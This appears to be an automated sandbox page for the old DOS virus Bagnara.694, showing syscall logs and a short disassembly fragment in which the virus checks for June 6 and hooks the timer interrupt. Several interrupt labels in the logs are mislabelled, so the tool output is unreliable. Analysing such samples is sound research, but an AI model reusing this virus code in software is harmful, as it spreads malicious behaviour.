Sample viewer

vx.netlux.org/Virus.DOS.Bagnara.694

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:20:55.327188863Z 24 PC: 12e45 | Reserved
2018-12-17T22:20:55.329751568Z 53 PC: 12eb2 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:20:55.331019621Z 37 PC: 12ec2 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:20:55.332256715Z 42 PC: 12ec6 | Get date 0x12ec6: cmp dx, 0x606
0x12eca: je 0x12ecf
0x12ecc: jmp 0x12e4a
0x12ecf: mov ax, 0x3508
0x12ed2: int 0x21
0x12ed4: mov word ptr [0x1ff], es
0x12ed8: mov word ptr [0x1fd], bx
0x12edc: mov ax, 0x2508
0x12edf: mov dx, 0x1c6
0x12ee2: int 0x21
0x12ee4: jmp 0x12e4a
0x12ee7: pushf
0x12ee8: push es
0x12ee9: push ax
0x12eea: dec byte ptr cs:[0x202]
0x12eef: jne 0x12f1a
0x12ef1: mov byte ptr cs:[0x202], 5
0x12ef7: xor ax, ax
0x12ef9: mov es, ax
0x12efb: mov al, byte ptr cs:[0x201]

{"DateBased":true,"Day":6,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3641,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:49:46.859399819Z 24 PC: 12e45 | Reserved
2018-12-25T11:49:46.860936069Z 53 PC: 12eb2 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:49:46.861923449Z 37 PC: 12ec2 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:49:46.862951164Z 42 PC: 12ec6 | Get date 0x12ec6: cmp dx, 0x606
0x12eca: je 0x12ecf
0x12ecc: jmp 0x12e4a
0x12ecf: mov ax, 0x3508
0x12ed2: int 0x21
0x12ed4: mov word ptr [0x1ff], es
0x12ed8: mov word ptr [0x1fd], bx
0x12edc: mov ax, 0x2508
0x12edf: mov dx, 0x1c6
0x12ee2: int 0x21
0x12ee4: jmp 0x12e4a
0x12ee7: pushf
0x12ee8: push es
0x12ee9: push ax
0x12eea: dec byte ptr cs:[0x202]
0x12eef: jne 0x12f1a
0x12ef1: mov byte ptr cs:[0x202], 5
0x12ef7: xor ax, ax
0x12ef9: mov es, ax
0x12efb: mov al, byte ptr cs:[0x201]
2018-12-25T11:49:46.865497451Z 53 PC: 12ed4 | Get interrupt vector (Interrupt = '8' AKA 'Console input without echo')
2018-12-25T11:49:46.866572773Z 37 PC: 12ee4 | Set interrupt vector (Interrupt = '8' AKA 'Console input without echo')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3641,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:49:46.89793991Z 24 PC: 12e45 | Reserved
2018-12-25T11:49:46.900584113Z 53 PC: 12eb2 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:49:46.902108293Z 37 PC: 12ec2 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:49:46.903587293Z 42 PC: 12ec6 | Get date 0x12ec6: cmp dx, 0x606
0x12eca: je 0x12ecf
0x12ecc: jmp 0x12e4a
0x12ecf: mov ax, 0x3508
0x12ed2: int 0x21
0x12ed4: mov word ptr [0x1ff], es
0x12ed8: mov word ptr [0x1fd], bx
0x12edc: mov ax, 0x2508
0x12edf: mov dx, 0x1c6
0x12ee2: int 0x21
0x12ee4: jmp 0x12e4a
0x12ee7: pushf
0x12ee8: push es
0x12ee9: push ax
0x12eea: dec byte ptr cs:[0x202]
0x12eef: jne 0x12f1a
0x12ef1: mov byte ptr cs:[0x202], 5
0x12ef7: xor ax, ax
0x12ef9: mov es, ax
0x12efb: mov al, byte ptr cs:[0x201]